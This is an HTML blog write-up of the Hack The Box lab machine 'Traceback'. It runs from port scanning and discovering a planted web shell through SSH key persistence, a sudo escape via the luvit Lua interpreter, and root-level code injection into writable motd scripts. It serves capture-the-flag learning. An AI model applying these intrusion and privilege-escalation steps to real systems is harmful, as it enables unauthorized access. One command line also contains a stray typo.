<p>This is a quick write-up for the HTB machine <a href="https://www.hackthebox.eu/home/machines/profile/233">Traceback</a>.</p>

<div class="section-heading style-2 mb-30">
    <h4>Enumeration</h4>
    <div class="line"></div>
</div>

<p>A quick port scan revealed a couple services.
<pre><code class="bash">nmap -Pn 10.10.10.181

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre></p> 

<p>I visited the web server, which had a "hacked" message. I tried enumerating directories, webpages, and HTTP methods, but nothing was of interest other than the message</p>

<pre><code class="html">&lt;body&gt;
	&lt;center&gt;
		&lt;h1&gt;This site has been owned&lt;/h1&gt;
		&lt;h2&gt;I have left a backdoor for all the net. FREE INTERNETZZZ&lt;/h2&gt;
		&lt;h3&gt; - Xh4H - &lt;/h3&gt;
		&lt;!--Some of the best web shells that you might need ;)--&gt;
	&lt;/center&gt;
&lt;/body&gt;
</code></pre></p> 

<p>I was lost for a bit, but focusing on the message I decided to look for common web shells that might already exist on the server. Once I finally searched for <code>Xh4H</code> and <code>web shell</code> together, I found the intended twitter message linking to a list of web shells.</p>

<p><img style="max-height: 250px;" src="/static/img/traceback/twitter.png"></p>

<p>I cloned the web shell repo and used a curl loop to see if any of the default filenames were found on the server.</p>

<pre><code class="bash">
git clone https://github.com/TheBinitGhimire/Web-Shells.git
for file in `ls Web-Shells`; do echo $file && vvvvvvvvvvvvvvcurl -I http://10.10.10.181/$file; done

punk-nopass.php
HTTP/1.1 404 Not Found

r57.php
HTTP/1.1 404 Not Found

smevk.php
HTTP/1.1 200 OK
</code></pre></p> 

<p>I quickly found that one of the scripts is on the server. After visiting the web shell <code>10.10.10.181/smevk.php</code>, there is a login page and it uses the credentials hardcoded in the script.</p>

<p><img style="max-height: 250px;" src="/static/img/traceback/login.png"></p>

<p>The web shell provides a lot of immediate info about our user-level permissions, including our username <code>webadmin</code>, and allows us to run a variety of post-exploitation enumeration scripts.</p>

<p><img style="max-height: 400px;" src="/static/img/traceback/webshell1.png"></p>

<p>I prefer to work from a standard SSH session rather than a web shell, so I add my public SSH key to the current user's <code>~/.ssh/authorized_keys</code> and then SSH to the host.</p>

<p><img style="max-height: 400px;" src="/static/img/traceback/webshell2.png"></p>

<p><pre><code>ssh webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat May  2 19:11:34 2020 from 10.10.14.34
webadmin@traceback:~$ 
</code></pre></p>

<p>The first thing I notice is the connection error in the motd when connecting. I checked for the user flag in webadmin's home directory, but didn't find it. Instead there is a <code>note.txt</code> with a pointed message about lua - which implies privesc is needed.</p>

<p><pre><code class="plaintext">webadmin@traceback:~$ cat ~/note.txt 
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
</code></pre></p>

<p>I started doing some standard user privesc checks and <code>sudo -l</code> finally led me to the next step. If you use any sort of enumeration or post post-exploitation scripts, this should get caught.</p>

<p><pre><code class="plaintext">webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
</code></pre></p>

<p>This means that our current user <code>webadmin</code> can run the <code>luvit</code> program as <code>sysadmin</code>. Luvit happens to be a lua REPL interpreter, which lines up with the <code>note.txt</code> from earlier. Running levit as sysadmin via sudo, we can spawn a shell with sysadmin's permissions. The user flag is in sysadmin's home directory.</p>

<p><pre><code class="bash">webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:~$ cat ~/user.txt
# HTB{user_flag}
</code></pre></p>

<p>Moving onto the root flag, I started privesc enumeration. When viewing the running processes, I noticed an odd job interacting with motd then I recalled the altered motd from earlier.</p>

<p><pre><code class="bash">root       5660  0.0  0.0   4628   772 ?        Ss   17:48   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/</code></pre></p>

<p>In hindsight, I got a little lucky with noticing the running process because it would disappear and reappear. This turned out to be a cronjob, which I believe could have been caught with further enumeration.</p>

<p>Checking out both directories involved in the process, I found writeable files in <code>/etc/update-motd.d/</code>. These files are altering the motd banner when connecting via SSH.</p>



<p><pre><code class="bash">sysadmin@traceback:~$ ls -lha /etc/update-motd.d/
total 32K
drwxr-xr-x  2 root sysadmin 4.0K Aug 27  2019 .
drwxr-xr-x 80 root root     4.0K Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 May  3 12:22 00-header
-rwxrwxr-x  1 root sysadmin  982 May  3 12:22 10-help-text
-rwxrwxr-x  1 root sysadmin 4.2K May  3 12:22 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 May  3 12:22 80-esm
-rwxrwxr-x  1 root sysadmin  299 May  3 12:22 91-release-upgrade

sysadmin@traceback:~$ cat /etc/update-motd.d/00-header 
#!/bin/sh

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"

</code></pre></p>

<p>Because this file is writeable, we can add some code that will be executed by root when we first connect over SSH. I simply added a command to display the root flag in the SSH motd banner. Then I reconnected to see the flag.</p>

<p><pre><code class="bash">sysadmin@traceback:~$ echo "cat /root/root.txt" >> /etc/update-motd.d/00-header 
sysadmin@traceback:~$ exit
webadmin@traceback:~$ exit
logout
Connection to 10.10.10.181 closed.
root@kali:~# ssh webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

HTB{root_flag}


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun May  3 12:19:35 2020 from 10.10.14.34
</code></pre></p>

